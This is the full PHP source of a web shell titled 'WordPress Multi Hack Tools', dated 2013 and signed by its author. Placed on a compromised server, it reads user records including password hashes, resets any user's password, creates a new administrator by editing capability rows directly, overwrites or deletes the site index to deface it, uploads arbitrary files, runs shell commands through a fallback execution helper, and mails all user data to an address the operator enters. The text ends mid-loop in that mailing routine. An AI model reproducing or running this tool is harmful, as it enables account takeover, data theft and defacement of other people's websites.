<?php
/**
Note : This Script Is Standard WordPress Function and info of database and data
        So Any Hook or plugin add new data I Don't know and i Don't Support
        Most Work on 3.6.1 on php5.4 and mysql 5.5
        And the Server Must support cookies and your Browser
        Thanks For Using My Script
        CopyRight By BeM981 (GNU GPL 2)
  ____       __  __  ___   ___  _ 
 | __ )  ___|  \/  |/ _ \ ( _ )/ |
 |  _ \ / _ \ |\/| | (_) |/ _ \| |
 | |_) |  __/ |  | |\__, | (_) | |
 |____/ \___|_|  |_|  /_/ \___/|_|

* WordPress Multi Tools
* By BeM981
* This SCript all by BeM981
* Every and each single code 
* CopyRight By BeM981
* Its open soruce so keep my name 
* if you edit it just put 
* By BeM981 dev by Your name
* Any thing else you do because you are a kid :p
*
*
* @packge wpmt
* @author BeM981
* @date 11/12/2013
* @Update None
* @version 1.5 
* Beta Version End No Error
* @supprot bem981@live.com
* @Facebook dH3Ss@facebook.com or fb.com/dH3Ss
* @Gmail fayez.bem@gmail.com 
* @live bem981@live.com
*/
//Config data
define("SCRIPTNAME","WordPress Multi Hack Tools");
define("AUTHOR","BeM981");
define("VERSION","1.3");
//Check Php Version
if (version_compare(PHP_VERSION, '5.1.0', '<') ) exit("Sorry, this version of script need php5 or up!\n");

//now option table data
$option_name = array( 
'active_plugins',
'admin_email',
'advanced_edit',
'avatar_default',
'avatar_rating',
'blacklist_keys',
'blogdescription',
'blogname',
'blog_charset',
'blog_public',
'can_compress_scripts',
'category_base',
'category_children',
'close_comments_days_old',
'close_comments_for_old_posts',
'comments_notify',
'comments_per_page',
'comment_max_links',
'comment_moderation',
'comment_order',
'comment_registration',
'comment_whitelist',
'cron',
'current_theme',
'dashboard_widget_options',
'date_format',
'db_version',
'default_category',
'default_comments_page',
'default_comment_status',
'default_email_category',
'default_link_category',
'default_pingback_flag',
'default_ping_status',
'default_post_format',
'default_role',
'ftp_credentials',
'gmt_offset',
'gzipcompression',
'hack_file',
'home',
'html_type',
'image_default_align',
'image_default_link_type',
'image_default_size',
'initial_db_version',
'large_size_h',
'large_size_w',
'links_recently_updated_append',
'links_recently_updated_prepend',
'links_recently_updated_time',
'links_updated_date_format',
'link_manager_enabled',
'mailserver_login',
'mailserver_pass',
'mailserver_port',
'mailserver_url',
'medium_size_h',
'medium_size_w',
'moderation_keys',
'moderation_notify',
'page_comments',
'page_for_posts',
'page_on_front',
'permalink_structure',
'ping_sites',
'posts_per_page',
'posts_per_rss',
'recently_activated',
'recently_edited',
'require_name_email',
'rewrite_rules',
'rss_use_excerpt',
'show_avatars',
'show_on_front',
'sidebars_widgets',
'siteurl',
'start_of_week',
'sticky_posts',
'stylesheet',
'tag_base',
'template',
'theme_mods_twentythirteen',
'theme_mods_twentytwelve',
'theme_switched',
'thread_comments',
'thread_comments_depth',
'thumbnail_crop',
'thumbnail_size_h',
'thumbnail_size_w',
'timezone_string',
'time_format',
'uninstall_plugins',
'uploads_use_yearmonth_folders',
'upload_path',
'upload_url_path',
'users_can_register',
'use_balanceTags',
'use_smilies',
'use_trackback',
'widget_archives',
'widget_categories',
'widget_meta',
'widget_recent-comments',
'widget_recent-posts',
'widget_rss',
'widget_search',
'widget_text',
'_site_transient_browser_d90fc1e9970c4bc87149b2293d3816f0',
'_site_transient_theme_roots',
'_site_transient_timeout_browser_d90fc1e9970c4bc87149b2293d3816f0',
'_site_transient_timeout_theme_roots',
'_site_transient_timeout_wporg_theme_feature_list',
'_site_transient_update_core',
'_site_transient_update_plugins',
'_site_transient_update_themes',
'_site_transient_wporg_theme_feature_list',
'_transient_dash_20494a3d90a6669585674ed0eb8dcd8f',
'_transient_dash_4077549d03da2e451c8b5f002294ff51',
'_transient_dash_aa95765b5cc111c56d5993d476b1c2f0',
'_transient_dash_de3249c4736ad3bd2cd29147c4a0d43e',
'_transient_is_multi_author',
'_transient_plugin_slugs',
'_transient_random_seed',
'_transient_timeout_dash_20494a3d90a6669585674ed0eb8dcd8f',
'_transient_timeout_dash_4077549d03da2e451c8b5f002294ff51',
'_transient_timeout_dash_aa95765b5cc111c56d5993d476b1c2f0',
'_transient_timeout_dash_de3249c4736ad3bd2cd29147c4a0d43e',
'_transient_timeout_plugin_slugs'
);
//functions
/*
* Function to help 
*   to choose a random color
*   @param all of it is salt random word you enter
*
*/
function color($s,$s1,$s2,$s3){
           
            $c = sha1(date("Y-m-d H:i:s").$s.$s1.$s2).md5(ceil(2 % 5 * strlen(md5($s1)) + 5 % strlen(md5($s2)) / strlen(time()))) .md5( $s1.time()).sha1($s2.time()).md5($s) ;
            $h =null;
            $len = strlen($c);
            for ($i=0; $i<$len; ++$i)
                $h .= sprintf('%02X',ord($c[$i])).' ';
               $t = sprintf("%02o",$h);          
             $h=explode(" ",$h);

             while($t < count($h)){
             
             if(isset($h[$t]) and isset($h[$t+$s3]) and isset($h[$t+$s3*2])){
             $color ="#".$h[$t].$h[$t+$s3].$h[$t+$s3*2];
                break;
             
             }else{
                $t++;
                continue;
                }
             }
             if(!isset($color)) $color = "#343930";
             return $color;
}
/**
* Function to get all info
*   about any user just ener the info you know
*
*   @param data the data to search for from type(column)
*   return user object get all info
*/
function getinfo($data,$type){
    global $wpdb;
    $q=$wpdb->get_results("select * from `{$wpdb->users}` where `{$type}` = '{$data}';");
    @$user = get_userdata( $q[0]->ID );
    if(is_wp_error($user)) return false;
    return $user;
}
/**
* function to reset password for user
*
*   @param user user object which return from function up pass the new pass 
*   return true if change or false if not 
*/
function rp($user,$pass){
    global $wpdb;
    do_action('retreive_password', $user->user_login);
	do_action('retrieve_password', $user->user_login);
    $allow = apply_filters('allow_password_reset', true, $user->ID);
    if(is_wp_error($allow)) return new WP_Error("Error",__("Error"));
    do_action('retrieve_password_key', $user->user_login, "BeM981");
	$wpdb->update($wpdb->users, array('user_activation_key' => "BeM981"), array('user_login' => $user->user_login));
	$user = $wpdb->get_row($wpdb->prepare("SELECT * FROM $wpdb->users WHERE user_activation_key = %s AND user_login = %s", "BeM981", $user->user_login));
    if ( empty( $user ) ) return new WP_Error("",__(""));
    wp_set_password($_POST['pass1'], $user->ID);
    wp_password_change_notification($user);
    if(!$wpdb->update($wpdb->users, array('user_activation_key' => ""), array('user_login' => $user->user_login)))
	    return true;
    else                        
        return false;    
}
/**
* This function will return a words by input word
*/
function check($data){
    switch(trim(strtolower($data))){
        case "getui":       return "Get User Info";         break;
        case "chup" :       return "Change User Password";  break;
        case "adda" :       return "Add New Admin";         break;
        case "chin" :       return "Change Site Index";     break;
        case "upaw" :       return "Upload As WordPress";   break;
        case "seus" :       return "Send All Users Data";   break;
        case "gbi"  :       return "Get Blog Info";         break;
        case "chbd" :       return "Change Blog Data";      break;
        case "chud" :       return "Change User Data";      break;
        default:    return "Unknown";   break;
    }
    

}
/**
* This function to check if is a dir
*   Then return a include file if yes false if not
*/
function dir_in($dir){
    
    if(!is_dir($dir)) return false;
    
    if(@!(include $dir."/wp-load.php")) die("Can't Include Data Error In Path {$dir} <br /> Or No Flie With Name wp-load.php");
  
    return true;
}
/**
* Function to get ini data
*   from upload file to tmp data ...etc
*   Back false if not or string if get data
*/
function iniget($in){

	if(function_exists('ini_get'))
		$out=ini_get($in);
	else
		$out=get_cfg_var($in);
	
return $out;
}
/**
 * Handles registering a new user.
 *
 * @param string $user_login User's username for logging in
 * @param string $user_email User's email address to send password and add
 * @return int|WP_Error Either user's ID or error on failure.
 */
function ruser( $user_login, $user_email ) {
	$errors = new WP_Error();

	$sanitized_user_login = sanitize_user( $user_login );
	$user_email = apply_filters( 'user_registration_email', $user_email );

	// Check the username
	if ( $sanitized_user_login == '' ) {
		$errors->add( 'empty_username', __( '<strong>ERROR</strong>: Please enter a username.' ) );
	} elseif ( ! validate_username( $user_login ) ) {
		$errors->add( 'invalid_username', __( '<strong>ERROR</strong>: This username is invalid because it uses illegal characters. Please enter a valid username.' ) );
		$sanitized_user_login = '';
	} elseif ( username_exists( $sanitized_user_login ) ) {
		$errors->add( 'username_exists', __( '<strong>ERROR</strong>: This username is already registered. Please choose another one.' ) );
	}

	// Check the e-mail address
	if ( $user_email == '' ) {
		$errors->add( 'empty_email', __( '<strong>ERROR</strong>: Please type your e-mail address.' ) );
	} elseif ( ! is_email( $user_email ) ) {
		$errors->add( 'invalid_email', __( '<strong>ERROR</strong>: The email address isn&#8217;t correct.' ) );
		$user_email = '';
	} elseif ( email_exists( $user_email ) ) {
		$errors->add( 'email_exists', __( '<strong>ERROR</strong>: This email is already registered, please choose another one.' ) );
	}

	do_action( 'register_post', $sanitized_user_login, $user_email, $errors );

	$errors = apply_filters( 'registration_errors', $errors, $sanitized_user_login, $user_email );

	if ( $errors->get_error_code() )
		return $errors;

	$user_pass = wp_generate_password( 12, false);
	$user_id = wp_create_user( $sanitized_user_login, $user_pass, $user_email );
	if ( ! $user_id ) {
		$errors->add( 'registerfail', sprintf( __( '<strong>ERROR</strong>: Couldn&#8217;t register you&hellip; please contact the <a href="mailto:%s">webmaster</a> !' ), get_option( 'admin_email' ) ) );
		return $errors;
	}

	update_user_option( $user_id, 'default_password_nag', true, true ); //Set up the Password change nag.

	wp_new_user_notification( $user_id, $user_pass );

	return $user_id;
}
/**
* This function will help to command on server
*   @param $in : Command 
*   @return Strnig value With The result of command
*/
function WP_exe($in) {
    $out = '';
    if(function_exists('exec')) {
        @exec($in,$out);
        $out = @join("\n",$out);
    }elseif(function_exists('passthru')) {
        ob_start();
        @passthru($in);
        $out = ob_get_clean();
    }elseif(function_exists('system')) {
        ob_start();
        @system($in);
        $out = ob_get_clean();
    }elseif(function_exists('shell_exec')) {
        $out = shell_exec($in);
    }elseif(is_resource($f = @popen($in,"r"))) {
        $out = "";
        while(!@feof($f))
            $out .= fread($f,1024);
        pclose($f);
    }else{
        $out = `$in`;
    }
    return $out;
}
/**
* Function this help to see all users
*   mean see how many in own page ..etc
*
*/
function pr($logstotal, $logspage) {
        global $page;
		$pagesnumber = round($logstotal/$logspage);
		$temp = "Pages: ";
		for ($i=0; $i<$pagesnumber; $i++) {
			if ($page == $i)
				$temp .= " [ <strong>".$i."</strong> ] ";
			else
				$temp .= " [".$i."] ";
		}
		$temp .= " Results ".($page*$logspage)." - ".(($page*$logspage)+$logspage)." of about ".$logstotal;
		return $temp;
}
//Make some param
    $color = color("BY BeM981 PhP Lover",SCRIPTNAME,AUTHOR,VERSION);

//begain style or html
?>
<!DOCTYPE HTML>
<html dir="ltr" lang="en-us">
<head>
<title>WordPress Multi Hack Tools By BeM981</title>
<style type="text/css">
    body{
        background-color:#e5e4e5;
       
    } 
    h1,h2,h4{
        width:100%;
        text-align:center;
        background-color:auto;
        color:<?=$color?>;
    }
    h1:hover,h2:hover{
        border:1px solid <?=$color?>;  
        background-color:<?=$color?>;  
        color:#f3f3f3;
    }
    p.footer{
		color:<?=$color?>; 
		margin-left : -8px;
		margin-bottom : 1px;
		height:2%;
		padding:10px 0;
		text-align:center;
		position:fixed;
		bottom:0px;
		text-shadow: 1px 1px 400px #0000dd;
		width:100%;
	}
	p.footer:hover{
	    border:1px solid <?=$color?>;  
        background-color:<?=$color?>;  
        color:#f3f3f3;
	}
	table.header{
	    width:100%;
        text-align:center;
        background-color:auto;
        color:<?=$color?>;
	}
	table.header td{
		border:1px solid <?=$color?>;  
       color:<?=$color?>;
       padding:20px 100px;
       	-moz-border-radius:700px;
		-webkit-border-radius:700px;
	
	}
	table.header td:hover{
	    border:1px solid <?=$color?>;  
        background-color:<?=$color?>;  
        color:#f3f3f3;
        cursor: pointer;
	}
	div.context,div.result{
	    width:100%;
	    color:<?=$color?>;
	    text-align:center;
	
	}
	input.in{
        background-color:#e4e5e4;
        border: 5px <?=$color?>;
        color:<?=$color?>;
        width:200px;
    
    }
    input.in:hover{
        background-color:<?=$color?>;
        color:#e4e5e4;    
       
    
    }
    .cmd{
		width:100px;
		background-color:#e4e5e4;
		color:<?=$color?>;
	}
	.cmd1{
	    width:300px;
		background-color:#e4e5e4;
		color:<?=$color?>;
	}
	.submit{
	    background-color:#e4e5e4;
        border: 5px <?=$color?>;
        color:<?=$color?>;
	}
	.submit:hover{
	    background-color:<?=$color?>;
        color:#e4e5e4;
	}
	table.mi{ text-align:left; }
	table.mi tr:hover{ background-color:<?=$color?>; color:#e4e5e4;}
	.long{
	   background-color:#e4e5e4;
        border: 5px <?=$color?>;
        color:<?=$color?>;
        width:200px;
	 }
	.long:hover{ 
        background-color:<?=$color?>;
        color:#e4e5e4;	
	}
</style>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
</head>
<body>
<!-- Begain Header -->
<header>
<h1 onclick="location.href='?#By_BeM981';">-:::[WordPress Multi Hack Tools]:::-</h1>
<h2><?=isset($_GET['be']) ? check($_GET['be']) : "By BeM981"?></h2>
<table class="header">
<tr><td onclick="location.href='?be=getui';">Get User Info</td><td onclick="location.href='?be=chup';">Change User Password</td><td onclick="location.href='?be=adda';">Add Admin</td><td onclick="location.href='?be=chin';">Change Index</td></td>
<tr><td onclick="location.href='?be=upaw';">Upload As WordPress</td><td onclick="alert('Sorry!Not Avaibly In This Version Wait to next Version 2.0');">Add Fake Theme</td><td onclick="alert('Sorry!Not Avaibly In This Version Wait to next Version 2.0');">Add Fake Plugin</td><td onclick="location.href='?be=seus';">Send Users</td></td>
<tr><td onclick="location.href='?be=gbi';">Get Blog Info</td><td onclick="alert('Sorry!Not Avaibly In This Version Wait to next Version 2.0');">Backdoor Blog</td><td onclick="location.href='?be=chbd';">Change Blog Data</td><td onclick="location.href='?be=chud';">Change User Data</td></td>
</table>
</header>
<!-- End The Header -->
<hr color="<?=$color?>"/>
<!-- Begain context -->
<div class="context">
<?php
    if(!isset($_GET['be'])):
       echo "Choose Your Action.....";   
    elseif($_GET['be'] == "getui"):
    ?>
        <h4>Please Enter Your Data</h4>
        <center>
        <table class="mi">
        <form method="post" action="" name="fm">

            <tr><td>WordPress Path </td><td>: <input type="text" name="path" value="<?=getcwd()?>" class="in" /></td></tr>
            <tr><td>Data You Get </td><td>: <input type="text" name="data" value="!!!" class="in" /></td></tr>
           <tr><td> Data Type Get </td><td>: <select name="type" class="cmd">
                            <option value="ID">User id</option>
                            <option value="user_login">user login name</option>
                            <option value="user_nicename">user nice name</option>
                            <option value="user_email">user email</option>
                            <option value="user_url">user url</option>
                            <option value="display_name">user seen name</option>
                            </select></td></tr>
            <tr><td>Done </td><td>:<input type="submit" value=">>" class="submit" onmouseover="this.value='Get Info By '+fm.data.value+' Data';" onmouseout="this.value='>>';" name="a" onclick="this.value='getui';" /></td></tr>
            <tr><td>Get All User </td><td>:<input type="submit" value=">>" class="submit" onmouseover="this.value='Get All';" onmouseout="this.value='>>';" name="a" onclick="this.value='geta';"/></td></tr> 
            <tr><td>Page Nummber(if all) </td><td>:<input type="text" value="1" class="in"  name="page" /></td></tr>     
                  
            </form>
            </table>
            </center>           
    <?php
    elseif($_GET['be'] == "chup"):
    ?>
        <h4>Please Eneter Your data</h4>
        <center>
        <table class="mi">
        <form method="post" action="" name="fm">
            <tr><td>WordPress Path </td><td>: <input type="text" name="path" value="<?=getcwd()?>" class="in" /></td></tr>
            <tr><td>User Login </td><td>: <input type="text" name="user" value="" class="in" /></td></tr>
            <tr><td>Passwd </td><td>: <input type="password" name="pass1" value="123456" class="in" onkeyup="fm.pass2.value=this.value;" /></td></tr>
            <tr><td>Passwd Again </td><td>: <input type="text" name="pass2" value="123456" class="in" onkeyup="this.value=null; fm.pass1.value=null;" /></td></tr>
            <tr><td>Done </td><td style="text-align:center;">:<input type="submit" value=">>" class="submit" onmouseover="this.value='Change '+fm.user.value+' Password';" onmouseout="this.value='>>';" name="a" onclick="this.value='chup';" /></td></tr>
            </form>
            </table>
            </center>
    
    <?php
    elseif($_GET['be'] == "adda"):
    ?>
        <h4>Please Eneter Your data</h4>
        <center>
        <table class="mi">
        <form method="post" action="" name="fm">
            <tr><td>WordPress Path </td><td>: <input type="text" name="path" value="<?=getcwd()?>" class="in" /></td></tr>
            <tr><td>User Login </td><td>: <input type="text" name="user" value="" class="in" /></td></tr>
            <tr><td>User Email </td><td>: <input type="text" name="email" value="" class="in" /></td></tr>
            <tr><td>User Url </td><td>: <input type="text" name="url" value="" class="in" /></td></tr>
            <tr><td>Display Name </td><td>: <input type="text" name="dn" value="" class="in" /></td></tr>
            <tr><td>Passwd </td><td>: <input type="password" name="pass1" value="123456" class="in" onkeyup="fm.pass2.value=this.value;" /></td></tr>
            <tr><td>Passwd Again </td><td>: <input type="text" name="pass2" value="123456" class="in" onkeyup="this.value=null; fm.pass1.value=null;" /></td></tr>
            <tr><td>Done </td><td style="text-align:center;">:<input type="submit" value=">>" class="submit" onmouseover="this.value='Add  '+fm.user.value+' As Administrator';" onmouseout="this.value='>>';" name="a" onclick="this.value='adda';" /></td></tr>
            </form>
            </table>
            </center>
    
    <?php    
    elseif($_GET['be'] == "chin"):
        ?>
        <h4>Enter The WordPress Path</h4>
        <center>
        <table class="mi">
        <form method="post" action="" name="fm">
            <tr><td>WordPress Path </td><td>: <input type="text" name="path" value="<?=getcwd()?>" class="in" /></td></tr>
            <tr style="width:75%;"><td>Your Index : </td><td>:<textarea class="long" name="index" cols="100" rows="25"></textarea></td></tr>
            <tr><td>Change </td><td>:<select class="cmd" name="type"><option value="mi">Main Index</option><option value="ti">Template Index</option>
                                                                     <option value="dmi">Drop Main Index And Make New</option><option value="dti">Drop Temp Index And Make New</option>
                                                                     
                                                                     </select></td></tr>
            <tr><td>Done </td><td>:<input type="submit" value=">>" class="submit" onmouseover="this.value='Change Index';" onmouseout="this.value='>>';" name="a" onclick="this.value='chin';" /></td></tr>
            </form>
            </table>
            </center>
    
    <?php   
    elseif($_GET['be'] == "upaw"):
        if(iniget("file_uploads")){
    ?>
        <h4>Upload As WordPress Uploads</h4>
        <center>
        <table class="mi">
        <form method="post" action="" name="fm" enctype="multipart/form-data">
            <tr><td>WordPress Path </td><td>: <input type="text" name="path" value="<?=getcwd()?>" class="in" /></td></tr>
            <tr><td>Upload File </td><td id="add">: <input type="file" name="file" class="in" /></td></tr>   
            <tr><td>Max Size </td><td>: <?=iniget("upload_max_filesize")?></td></tr>
            <tr><td>Done </td><td>:<input type="submit" value=">>" class="submit" onmouseover="this.value='Upload File';" onmouseout="this.value='>>';" name="a" onclick="this.value='upaw';" /></td></tr>
            </form>
            </table>
            </center>
    <?php
    }else{
    ?>
        <h4>The Server Does Not Support Upload File</h4>
    <?php
    }
    elseif($_GET['be'] == "seus"):
    ?>
        <h4>Send User Data To Email</h4>
        <center>
            <table class="mi">
                <form method="post" action="" name="fm">
                    <tr><td>WordPress Path </td><td>: <input type="text" name="path" value="<?=getcwd()?>" class="in" /></td></tr>
                    <tr><td>E-mail To Send </td><td>: <input type="text" name="email" class="in" /></td></tr>
                    <tr><td>User data Send </td><td>: <input type="text" name="user" placeholder="to all (1) or user login" class="in" title="to all users enter->(1) or user login to one user or for more than one user Make Sure Between users (,) ex:(admin,bem981,hacker)" alt="to all users enter->(1) or user login to one user or for more than one user Make Sure Between users (,) ex:(admin,bem981,hacker)"/></td></tr>
                    <tr><td>Send Mail Type </td><td>: <select class="cmd" name="type">
                                                        <option value="mail">Mail Function</option>
                                                        <option value="sendmail">Send By SendMail File</option>
                                                        <option value="smtp">Send By Smtp Server</option>
                                                        </select></td></tr>
                    <tr><td>Done </td><td>:<input type="submit" value=">>" class="submit" onmouseover="this.value='Send '+fm.user.value+' Data';" onmouseout="this.value='>>';" name="a" onclick="this.value='seus';" /></td></tr>
            </table>
        </center>
    <?php
    elseif($_GET['be'] == "gbi"):
        ?>
        <h4>Get Blog Info</h4>
        <center>
            <table class="mi">
                <form method="post" action="" name="fm">
                    <tr><td>WordPress Path </td><td>: <input type="text" name="path" value="<?=getcwd()?>" class="in" /></td></tr>
                    <tr><td>Page </td><td>:<input type="text" name="page" class="in" value="0" /></td></tr>
                    <tr><td>Data Per Page </td><td>:<input type="text" name="upp" class="in" value="15" /></td></tr>
                    <tr><td>Order BY </td><td>: <select name="order" class="cmd"> 
                                                <option value="option_id">By Id </option>
                                                <option value="option_value">By Value </option>
                                                <option value="option_name">By Name </option>                    
                                                </select></td></tr>
                    <tr><td>Up Or Down </td><td>: <select name="ty" class="cmd">
                                                  <option value="ASC" >Up</option>
                                                  <option value="DESC">Down</option>
                                                  </select></td></tr>
                    <tr><td>Done </td><td>:<input type="submit" value=">>" class="submit" onmouseover="this.value='Get Blog(<?=$_SERVER['HTTP_HOST']?>) Info';" onmouseout="this.value='>>';" name="a" onclick="this.value='gbi';" /></td></tr>
            </table>
        </center>
    <?php
    elseif($_GET['be'] == "chbd"):
        ?>
        <h4>Change Blog Data</h4>
        <center>
            <table class="mi">
                <form method="post" action="" name="fm">
                    <tr><td>WordPress Path </td><td>: <input type="text" name="path" value="<?=getcwd()?>" class="in" /></td></tr>
                    <tr><td>OPtion Name </td><td>:<select name="name" class="cmd1" size="10" title="Note : There Is Data I Have No Idea For What!" >
                                                  <?php
                                                  foreach($option_name as $v)
                                                    echo "<option value='$v'>$v</option>";
                                                  ?>
                                                  </select>
                                                        </td></tr>
                    <tr><td>Value </td><td>: <input type="text" name="value" class="in" value="" /></td></tr>
                    <tr><td>Done </td><td>:<input type="submit" value=">>" class="submit" onmouseover="this.value='Change '+fm.name.value+' To '+fm.value.value;" onmouseout="this.value='>>';" name="a" onclick="this.value='chbd';" /></td></tr>
            </table>
        </center>
    <?php
    
    
    elseif($_GET['be'] == "chud"):
    ?>
        <h4>Change User Data</h4>
        <center>
            <table class="mi">
                <form method="post" action="" name="fm">
                    <tr><td>WordPress Path </td><td>: <input type="text" name="path" value="<?=getcwd()?>" class="in" /></td></tr>
                    <tr><td>User Login(You Must Enter It) </td><td>: <input type="text" name="user" placeholder="User Login This Can't Change " class="in" /></td></tr>
                    <tr><td>User PassWord </td><td>: <input type="password" name="pass" placeholder="PassWord" class="in" onkeyup='fm.pass2.value=this.value;'/></td></tr>
                    <tr><td>Password Again </td><td>: <input type="text" name="pass2" placeholder="PAssWord Again" class="in" /></td></tr>
                    <tr><td>User Email </td><td>: <input type="text" name="email" placeholder="User Email" class="in" /></td></tr>
                    <tr><td>User Nicename </td><td>: <input type="text" name="nice" placeholder="NiceName" class="in" /></td></tr>
                    <tr><td>User Display Name </td><td>: <input type="text" name="dn" placeholder="Disaply Name For Readers" class="in" /></td></tr>
                    <tr><td>User Activation Key </td><td>: <input type="text" name="ak" placeholder="Actiation Key" class="in" /></td></tr>
                    <tr><td>Done </td><td>:<input type="submit" value=">>" class="submit" onmouseover="this.value='Change '+fm.user.value+' Data';" onmouseout="this.value='>>';" name="a" onclick="this.value='chud';" /></td></tr>
            </table>
        </center>
    <?php
    else:
        echo "There Is No action Like That.";
    endif;
    
?>
</div>
<!-- End Context -->
<hr color="<?=$color?>"/>
<center><font color="<?=$color?>" size="+1">Result For Your Actions : </font></center>
<!-- Begain result -->
<div class="result">
<?php
    if(!isset($_POST['a'])):

        echo "Watting To Do Your Action........";
    elseif($_POST['a'] == "getui"):
        dir_in($_POST['path']); 
        $user = getinfo($_POST['data'],$_POST['type']);
        
        if(!$user) die("Error In Your Data Type Or Data");
        echo "<center><table class='mi'>";
        echo "<tr><th>Every Thing Is Okay : </th></tr>";
        echo "<tr><td>User ID </td><td>: ".$user->ID."</td></tr>";
        echo "<tr><td>User login </td><td>: ".$user->user_login."</td></tr>";
        echo "<tr><td>User Password </td><td>: ".$user->user_pass."</td></tr>";
        echo "<tr><td>User Nicename </td><td>: ".$user->user_nicename."</td></tr>";
        echo "<tr><td>User Email </td><td>: ".$user->user_email."</td></tr>";
        echo "<tr><td>User Url </td><td>: ".$user->user_url."</td></tr>";
        echo "<tr><td>User Activation Key </td><td>: ".$user->user_activation_key."</td></tr>";
        echo "<tr><td>User Online </td><td>: ".$user->user_status."</td></tr>";
        echo "<tr><td>User Registered </td><td>: ".$user->user_registered."</td></tr>";
        echo "</table></center><br /><br />";
    elseif($_POST['a'] == "chup"):
                 if(!(dir_in($_POST['path']))) die("The Path You Enter Is Not A Dir {$_POST['path']} Or <br /> Is Not The WordPress Path So I Include Data");
         if(
            isset($_POST['user'])   &&
            isset($_POST['pass1'])  &&
            isset($_POST['pass2'])  &&
            $_POST['pass1'] == $_POST['pass2']
         ){
            
            $user = getinfo($_POST['user'],"user_login");
            
            if(!rp($user,$_POST['pass1'])) echo "Failed To Change Password :("; else echo "Change Password Done user : ".$user->user_login." With Password : ".$_POST['pass1'];      
            echo "<br /> Wait Let Me Check If Every Is okay.....";

            $user = wp_authenticate($user->user_login, $_POST['pass1']);
            
            if(is_wp_error($user)) die("Failed");
            
            echo "Done Have Fun";
            
         }else{
            
            die("Some Data Is Missing");
         }
    elseif($_POST['a'] == "adda"):
        dir_in($_POST['path']); 
        if(
            isset($_POST['user'])               &&
            isset($_POST['email'])              &&
            isset($_POST['url'])                &&
            isset($_POST['dn'])                 &&
            isset($_POST['pass1'])              &&
            $_POST['pass1'] == $_POST['pass2']  
        ){
            ruser($_POST['user'],$_POST['email']);
            
            $user = get_user_by( 'login' , $_POST['user']);
            
            if(!(rp($user,$_POST['pass1']))) die("User Add Done But Cant Change Password Check Your email");
            
                if(!($wpdb->update($wpdb->users, array('user_activation_key' => "",'user_url' => $_POST['url'],'display_name' => $_POST['dn']), array('user_login' => $user->user_login)))){
                    die("Cant Change User Data :()");
                }else{
                   
                   echo "Your Are Now A member Let Me Get privileges For You :) <br />";
                                     
                 }
                 if(!($wpdb->update($wpdb->usermeta, array('meta_value' => 'a:1:{s:13:"administrator";b:1;}'), array('user_id' => $user->ID , 'meta_key' => $wpdb->prefix.'capabilities' ))))
                        die("Your Are Member But i Cant Get privileges For You :( You Should Remove User ");
                if(!($wpdb->update($wpdb->usermeta, array('meta_value' => '10'), array('user_id' => $user->ID , 'meta_key' => $wpdb->prefix.'user_level' ))))
                        die("Your Are Member But i Cant Get privileges For You :( You Should Remove User ");
                        
                 echo "Your Are A Administrator with all privileges Have Fun <br />";
                    echo "<pre>";
                    var_dump($user);
                    echo "</pre>";
        }else{
            
            die("Some Data Is Missing");
            
        }
        
    elseif($_POST['a'] == "chin"):
        dir_in($_POST['path']);   
        $templ = get_home_template();
        $index = $_POST['path']."/index.php";
        
        if(@$_POST['type'] == "mi"){
            if(!is_writeable($index)){ print("The File ({$index}) Is Not Writeable Try Chmod Now!");
                if(!(WP_exe("Chmod 777 ".$index))) die("<br />Can't Chmod File We Done here");
                if(function_exists("chmod")){
                    $c = 777;
				    $perms = 0;
                    for($i=strlen($c)-1;$i>=0;--$i)
                        $perms += (int)$c[$i]*pow(8, (strlen($c)-$i-1));
                    if(!(@chmod($index,$perms))) die("<br /> Also Chmod Function Failed");
                }
                echo "<br />Chmod Mode Done with 777 Our love :* <br /> Now Change Index";
            }
            $fo = fopen($index,"w+");
            
            fwrite($fo,$_POST['index']) or fputs($fo,$_POST['index']) or file_put_contents($index,$_POST['index']);
            
            fclose($fo);
        }elseif(@$_POST['type'] == "ti"){
                           
                if(!is_writeable($templ)){ print("The File ({$templ}) Is Not Writeable Try Chmod Now!");
                if(!(WP_exe("Chmod 777 ".$templ))) die("<br />Can't Chmod File We Done here");
                if(function_exists("chmod")){
                    $c = 777;
				    $perms = 0;
                    for($i=strlen($c)-1;$i>=0;--$i)
                        $perms += (int)$c[$i]*pow(8, (strlen($c)-$i-1));
                    if(!(@chmod($templ,$perms))) die("<br /> Also Chmod Function Failed");
                }
                    echo "<br />Chmod Mode Done with 777 Our love :* <br /> Now Change Index";
                }
                $fo = fopen($templ,"w+");
            
                fwrite($fo,$_POST['index']) or fputs($fo,$_POST['index']) or file_put_contents($templ,$_POST['index']);
            
                fclose($fo);
        
        }elseif(@$_POST['type'] == "dmi"){
            if(!(@unlink($index))) die("Can't Drop File ({$index})");
                $fo = fopen($index,"w+");
            
                fwrite($fo,$_POST['index']) or fputs($fo,$_POST['index']) or file_put_contents($index,$_POST['index']);
            
                fclose($fo);
                echo "Index Change Done :)";
        }elseif(@$_PSOT['type'] == "dti"){
            if(!(@unlink($templ))) die("Can't Drop File ({$templ})");
                $fo = fopen($templ,"w+");
            
                fwrite($fo,$_POST['index']) or fputs($fo,$_POST['index']) or file_put_contents($templ,$_POST['index']);
            
                fclose($fo);
                echo "Index Change Done :)";
        }else{
        
            die("No Action Like That!");
        }
        
    elseif($_POST['a'] == "upaw"):
        dir_in($_POST['path']);
        
        require_once ABSPATH."wp-admin/includes/file.php";
        
        $overrides = array( 'test_form' => false, 'test_type' => false );
        
		$file = wp_handle_upload( $_FILES["file"], $overrides );
        
        if(!is_file(@$file['file'])) die("Error In Upload");
        echo "<center> <table class='mi'>";
        echo "<tr><td>File Upload </td><td>: Done</td></tr>";
        echo "<tr><td>Local Path </td><td>: ".$file['file']."</td></tr>";
        echo "<tr><td>File Url </td><td>: <a href='".$file['url']."' title='Goto File'>".$file['url']."</a></td></tr>";
        echo "</table></center> <br /><br /><br /><br />";
      elseif($_POST['a'] == "seus"):
        dir_in($_POST['path']);
        
            $user = array();
        
        if( $_POST['user'] == 1){
            
           $users = $wpdb->get_results("select * from `{$wpdb->users}`");
            for($i = 0; $i < count($users) ; $i++){
                $user[$i][0] = $users[$i];
            
            }
                    
        }elseif(strpos($_POST['user'],',') !== false){
                
                $u = explode(",",$_POST['user']);
                
                $i = null; unset($i);
                
                for($i = 0; $i < count($u); $i++){
                
                    $user[] = $wpdb->get_results("select * from `{$wpdb->users}` where `user_login` = '{$u[$i]}';");
                
                }
        
        }else{
        
                $user[] = $wpdb->get_results("select * from `{$wpdb->users}` where `user_login` = '{$_POST['user']}';");
                
        }        

        $i = null;
        
        unset($i);
        
        for($i = 0 ;$i < count($user) ; $i++)
